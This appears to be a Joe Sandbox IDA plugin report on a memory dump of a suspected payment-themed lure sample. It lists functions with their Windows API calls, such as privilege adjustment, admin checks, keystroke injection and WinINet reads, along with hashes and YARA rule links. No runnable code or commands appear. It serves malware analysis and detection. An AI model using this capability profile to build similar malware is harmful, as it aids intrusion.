_wcscmp.LIBCMT ref: 00FFEBBA
_wcscmp.LIBCMT ref: 00FFEBCF
FindNextFileW.KERNEL32(00000000,?), ref: 00FFEBE0
FindClose.KERNEL32(00000000,00000001,00000000), ref: 00FFEC0E

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNext
String ID:
API String ID: 2387731787-0
Opcode ID: 48f7549ea03a6f4fa046110c256d06af10bf88536b2eec0d4ebeaac000c47109
Instruction ID: ce1e99d734992f4dd7ebb50562386130acac67e21304b888757844182eb71e8f
Opcode Fuzzy Hash: 48f7549ea03a6f4fa046110c256d06af10bf88536b2eec0d4ebeaac000c47109
Instruction Fuzzy Hash: 3B41ED316003029FC718DF28C891EAAB3E9FF49324F10451EFA5A8B3B1DB35A944DB91

Function 01018111 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 01018160
IsWindowEnabled.USER32 ref: 0101816E
GetForegroundWindow.USER32(?,?,00000001), ref: 0101817B
IsIconic.USER32 ref: 01018189
IsZoomed.USER32 ref: 01018197

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: de59082a54596b2095ca71f7d456ff73562b2567cebc3bca45e9ec71107240a1
Instruction ID: 21b25235f092fb0a852a7fc9947084615803ff3fa5315ad10f19b857aca990de
Opcode Fuzzy Hash: de59082a54596b2095ca71f7d456ff73562b2567cebc3bca45e9ec71107240a1
Instruction Fuzzy Hash: F411B2323002116BE7215F6ADC45E6FBB9CEF45760B44846AF989D7285CB3DDA0187A0

Function 00FB9B60 Relevance: 7.3, Strings: 5, Instructions: 1055COMMON

Download Yara Rule

Strings

ERCP, xrefs: 00FB9C32
VUUU, xrefs: 00FB9EA7
VUUU, xrefs: 00FB9E95
VUUU, xrefs: 00FB9ED4
VUUU, xrefs: 0103BE14

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-1546025612
Opcode ID: 08fc02701c1229ecbb504b359cc9b9cccdee0e4e7b241d32bf16d23d22fbfe48
Instruction ID: 890cf191f8d8a02ae24ddb0dc428c06f0044e7934628acbba839e70212d39838
Opcode Fuzzy Hash: 08fc02701c1229ecbb504b359cc9b9cccdee0e4e7b241d32bf16d23d22fbfe48
Instruction Fuzzy Hash: 64929B71E0421ACBEF24CF59C8807EDB7B5BB84314F14819AE95AEB280D7719981EF91

Function 00FCE01E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00FCE014,771B0AE0,00FCDEF1,0104DC38,?,?), ref: 00FCE02C
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00FCE03E

Strings

GetNativeSystemInfo, xrefs: 00FCE038
kernel32.dll, xrefs: 00FCE027

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: 847ce2a7c895665e513a5662cc022216fedf1409d9424484287e1318aff8c1f3
Instruction ID: 67e37b7d6da2fe185dc3a53c4bcf2bc71058703f1dda07f7d75d9732281492e1
Opcode Fuzzy Hash: 847ce2a7c895665e513a5662cc022216fedf1409d9424484287e1318aff8c1f3
Instruction Fuzzy Hash: 07D0C970940713AFD7315FA6ED19B5276ECAB04722F18842EE8D6D2204EBF8D8849B90

Function 00FF13CA Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 560stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 00FF13DC

Strings

|, xrefs: 00FF140C
(, xrefs: 00FF1422

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: e3b14f4dc459f47e9544a85f921f77ccf3915ece712847e48044c4c5190d3d0c
Instruction ID: ad6f28c06f741f12d8c2c174d2ffb7e95daabed6e6446c25e2daa6e830121184
Opcode Fuzzy Hash: e3b14f4dc459f47e9544a85f921f77ccf3915ece712847e48044c4c5190d3d0c
Instruction Fuzzy Hash: E2321375A00609DFC728CF69C480A6AB7F0FF88320B15C56EE59ADB3A1E770E941DB44

Function 00FCB11F Relevance: 4.9, APIs: 3, Instructions: 377COMMON

Download Yara Rule

APIs

Part of subcall function 00FCB34E: GetWindowLongW.USER32(?,000000EB), ref: 00FCB35F

DefDlgProcW.USER32(?,?,?,?,?), ref: 00FCB22F

Part of subcall function 00FCB55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00FCB5A5

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Proc$LongWindow
String ID:
API String ID: 2749884682-0
Opcode ID: af73d15de3917ae6c000b0a0fd594dd4a8de46987e5126ec36edda697669a4a3
Instruction ID: 54a1da9859ca606d5f249d8b4e283627445a603ccd41d5897d003ec49ae7d3db
Opcode Fuzzy Hash: af73d15de3917ae6c000b0a0fd594dd4a8de46987e5126ec36edda697669a4a3
Instruction Fuzzy Hash: 75A14779514027BAEA3A6B2A8E8BFFF399CEB95350F04410DF581D2185DB29DC01B672

Function 01004EB5 Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,010043BF,00000000), ref: 01004FA6
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 01004FD2

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 1e2e1f1ad6ce57c34e1a3271924da571b0952958e8342caebd8c38154253907e
Instruction ID: 74c59d4f7391921aa0ec3af2a5262d72a987607827148969eb0502e9cf403bff
Opcode Fuzzy Hash: 1e2e1f1ad6ce57c34e1a3271924da571b0952958e8342caebd8c38154253907e
Instruction Fuzzy Hash: B041C371604209BFFB22DE94CC85EBFB7ECEB40754F00406EF785A61C1EA719E419AA4

Function 00FFE1FD Relevance: 4.6, APIs: 3, Instructions: 72COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00FFE20D
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00FFE267
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00FFE2B4

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 106cc10a1ba9d8996be60d2299a0fe1a7d1cffbae7ffe5695e66d8fab8d12f50
Instruction ID: fedffee884bf6cbbb63f87d100cf7fd3951c47a9be83a6ead89c6e562f74daa0
Opcode Fuzzy Hash: 106cc10a1ba9d8996be60d2299a0fe1a7d1cffbae7ffe5695e66d8fab8d12f50
Instruction Fuzzy Hash: 24215C35A00118EFCB00EFA5D895EEDFBB8FF48310F0484A9E945A7351DB359905DB50

Function 00FEB134 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00FCF4EA: std::exception::exception.LIBCMT ref: 00FCF51E
Part of subcall function 00FCF4EA: __CxxThrowException@8.LIBCMT ref: 00FCF533

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00FEB180
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00FEB1AD
GetLastError.KERNEL32 ref: 00FEB1BA

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: 8a2efa40f3544ef580c8ebd9dd407a7c54081be15707c213981f7ef7df4520f8
Instruction ID: bc2dc5c4e468495a2774e711634a9d85027ce52d7bb2e7df959012e969fe5428
Opcode Fuzzy Hash: 8a2efa40f3544ef580c8ebd9dd407a7c54081be15707c213981f7ef7df4520f8
Instruction Fuzzy Hash: 7D11B2B1504205AFE7289F55DCC6D6BF7BDEB44720B10852EF05693240D774FC418B60

Function 00FF6685 Relevance: 4.6, APIs: 3, Instructions: 61fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00FF66AF
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,0000000C,?,00000000), ref: 00FF66EC
CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00FF66F5

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: 4ea8b7375df328f00c6020218df4029a2b9714e5029e447929fe65da06c4adc2
Instruction ID: 2e8b5cc420bb85cc71f50b94850fdb3a11677cbf9204952f2eb115ad9d94c136
Opcode Fuzzy Hash: 4ea8b7375df328f00c6020218df4029a2b9714e5029e447929fe65da06c4adc2
Instruction Fuzzy Hash: B01182B2D00228BEE7109AA8DC45FBF77ACEB04724F004555FA01E7190C7789E0497A1

Function 00FF71FA Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00FF7223
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00FF723A
FreeSid.ADVAPI32(?), ref: 00FF724A

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 7185e8377102826837ebbb9a60e0abfaddc452ff4764c71c228eaab737581057
Instruction ID: d1d5500ba9a83681d18ee5041c9f701a891959176c6ef28003e894436a57aa2a
Opcode Fuzzy Hash: 7185e8377102826837ebbb9a60e0abfaddc452ff4764c71c228eaab737581057
Instruction Fuzzy Hash: DEF01776A14309BFDF04DFF4D989AEEFBBCEF08601F504869B602E2181E2759A549B10

Function 00FFF56F Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00FFF599
FindClose.KERNEL32(00000000), ref: 00FFF5C9

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 7b27bc2be339b6386bcb0c2f41c68d3b87ad90d3595732347757a6530e963552
Instruction ID: de408e85da5e6c828c616b42ef1b04ec21100ddb5891fc85d5319af472dd643b
Opcode Fuzzy Hash: 7b27bc2be339b6386bcb0c2f41c68d3b87ad90d3595732347757a6530e963552
Instruction Fuzzy Hash: 2011A1326042049FD710EF28D845A2EB3E8FF84324F04891EF9A5D7391CB34A9049B81

Function 00FFCE7A Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0100BE6A,?,?,00000000,?), ref: 00FFCEA7
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0100BE6A,?,?,00000000,?), ref: 00FFCEB9

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: f12f7a5bdda974ca51193d2a391ce636ec1d0593d94233b658110fde86bbbaf2
Instruction ID: c73305ebb458079e50e06fb4aabc6452717315def5326f1786989b47c8f4146e
Opcode Fuzzy Hash: f12f7a5bdda974ca51193d2a391ce636ec1d0593d94233b658110fde86bbbaf2
Instruction Fuzzy Hash: CFF08C3150022DEBDB20AAA4DC49FFA776DBF083A1F008166F919D6191D634DA54DBA0

Function 00FF411C Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00FF4153
keybd_event.USER32(?,75A4C0D0,?,00000000), ref: 00FF4166

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: fd5a0c6c0f1af22160c2967fcdaa1e31c83177ffc5e3dd46d91a787b6a70a9f5
Instruction ID: b92884ee68738b8b1e438420be37b22d0c5e9e4a2b446999b0cc8f9e2e8abb7c
Opcode Fuzzy Hash: fd5a0c6c0f1af22160c2967fcdaa1e31c83177ffc5e3dd46d91a787b6a70a9f5
Instruction Fuzzy Hash: 73F0677180024DAFDB168FA0C805BBEBBB4EF00305F00800AF966A61A2D77996129FA0

Function 00FEAB84 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00FEACC0), ref: 00FEAB99
CloseHandle.KERNEL32(?,?,00FEACC0), ref: 00FEABAB

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 157010f340f4e4b14c73cd6dcc1aacf0fe611ec68a40bc19792c9a526a227800
Instruction ID: ca0386a03d270341445b9a670c378863a5bf083b1b034078357b1f2e48c8e4d9
Opcode Fuzzy Hash: 157010f340f4e4b14c73cd6dcc1aacf0fe611ec68a40bc19792c9a526a227800
Instruction Fuzzy Hash: 37E08635004511AFE7212F54EC05EB3B7EEEF00320710882DF59A81430D7276C90EB50

Function 00FD81AC Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00FD6DB3,-0000031A,?,?,00000001), ref: 00FD81B1
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00FD81BA

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 06aa5691a9c2d080ade82a1174946b0199c6b8fab82efbf5a23df69cb073efbe
Instruction ID: 6b42b61a52273e9c13562809a48cd206ee416d7a62c0d60576a36b5ff7e8fc48
Opcode Fuzzy Hash: 06aa5691a9c2d080ade82a1174946b0199c6b8fab82efbf5a23df69cb073efbe
Instruction Fuzzy Hash: 38B09271044608ABDB102BE1E809B987F6CEB08652F808010F64D450558B7758209B91

Function 00FB77B0 Relevance: 2.6, APIs: 1, Instructions: 1076COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00FB7921

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: b5bc35d4556b31543f2a7a8bf9d21c6e5c257cf1be6575bef059e3a21e349160
Instruction ID: 32ca503f634672aeabfa83861c575880aa89634fa4f4d472c3b131ca37df8ca4
Opcode Fuzzy Hash: b5bc35d4556b31543f2a7a8bf9d21c6e5c257cf1be6575bef059e3a21e349160
Instruction Fuzzy Hash: 81A25971E04219CFDB24CF59C4807EDBBB5BF88350F2581A9E899AB391D7349A81DF50

Function 00FDD1B9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30b2fb0b24e58c11efc26f860b11f19bcbb86acdd13512132dd3b4606b60c34c
Instruction ID: 733a891b0e60c614ef0ecb1a9ab6c57dcdbe75c4f2278a7e3ce91e4204f17327
Opcode Fuzzy Hash: 30b2fb0b24e58c11efc26f860b11f19bcbb86acdd13512132dd3b4606b60c34c
Instruction Fuzzy Hash: 95325672E29F014ED7239534D961339629DAFB33D4F19C727F819B5A9AEB2AC4835200

Function 00FB96C0 Relevance: 2.1, APIs: 1, Instructions: 573COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: __itow__swprintf
String ID:
API String ID: 674341424-0
Opcode ID: b1a3f0bf7fe58265e6bc0789175c114f1e1b9bdd522465ca5311387e65a3821f
